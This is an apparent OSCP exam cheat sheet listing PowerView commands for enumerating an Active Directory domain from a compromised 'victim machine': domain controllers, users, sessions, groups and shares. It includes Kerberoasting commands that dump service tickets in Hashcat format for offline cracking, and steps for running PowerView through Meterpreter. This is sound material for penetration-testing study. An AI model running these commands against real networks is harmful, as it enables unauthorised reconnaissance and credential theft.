PowerView

PowerView is part of the PowerSploit and the PowerShell Empire Framework.

Officially allowed during the OSCP exam according to the OSCP Exam FAQ.

PowerView (HackTricks)
OSCP Blog Series – OSCP Cheatsheet – PowerView Commands

Location

Upload to the victim machine. See File Transfer.

/usr/share/windows-resources/powersploit/Recon/PowerView.ps1

Enumeration

powershell
Import-Module .\PowerView.ps1

Domain

Domain name & Domain Controllers

Get-NetDomain

Domain SID

Get-DomainSID

Policy

Get-DomainPolicy

Domain controller

Get-NetDomainController -Domain <domain>

Computers

Get-NetComputer | select cn, samaccountname, samaccounttype, operatingsystem, serviceprincipalname | Format-Table -AutoSize | Out-String -Width 4096

Computers & OS

Get-NetComputer | select cn, samaccountname, operatingsystem

Computers & SPNs

Get-NetComputer | select cn, samaccountname, serviceprincipalname | Where-Object { $_.serviceprincipalname } | Out-String -Width 4096

Users & Sessions

Enumerate logged in users – DO THIS FOR EVERY COMPUTER FOUND

GetNetLoggedon uses NetWkstaUserEnum, which requires to be a local administrator.

Get-NetLoggedon | Format-Table

Get-NetLoggedon -ComputerName <computer name> | Format-Table

Retrieve active sessions on the domain controller – DO FOR FILE SERVERS AND DC

Get-NetSession uses NetSessionEnum, which can be run as a regular AD user.

Get-NetSession -ComputerName <DC compute name> | Format-Table

Users & groups

Very useful!

Get-NetUser | select samaccountname,objectsid,memberof | Out-String -Width 4096

Service Principal Names (SPN)

Very useful! Get a Kerberos ticket for Kerberoasting.

Get-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]

Get-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]

Get-DomainSPNTicket -SPN "<SPN>"

Get-DomainSPNTicket -User "<Object ID of user>"

Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.

Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat

Request Kerberos service ticket for a specific SPN

Not tested by me

Request-SPNTicket -SPN "<SPN>"

Groups

List groups

Get-DomainGroup | select samaccountname | Sort-Object -Property samaccountname

Get-NetGroup | select samaccountname | Sort-Object -Property samaccountname

Groups & Members

Get-NetGroup | select samaccountname,member | Where-Object { $_.member } | Out-String -Width 4096

Get-DomainGroupMember -Recurse -Identity "*" | select GroupName,MemberName,MemberSID | Out-String -Width 4096

Get-DomainGroupMember -Recurse -Identity "Domain Admins" | select GroupName,MemberName,MemberSID | Out-String -Width 4096

Search file servers. Lot of users use to be logged in this kind of servers

Get-NetFileServer

Search readable shares

Find-DomainShare -CheckShareAccess

Find interesting files, can use filters

Find-InterestingDomainShareFile

PowerView within Metasploit

Within a Meterpreter session

load powershell
powershell_import /root/Desktop/PowerView.ps1
powershell_execute Get-NetDomain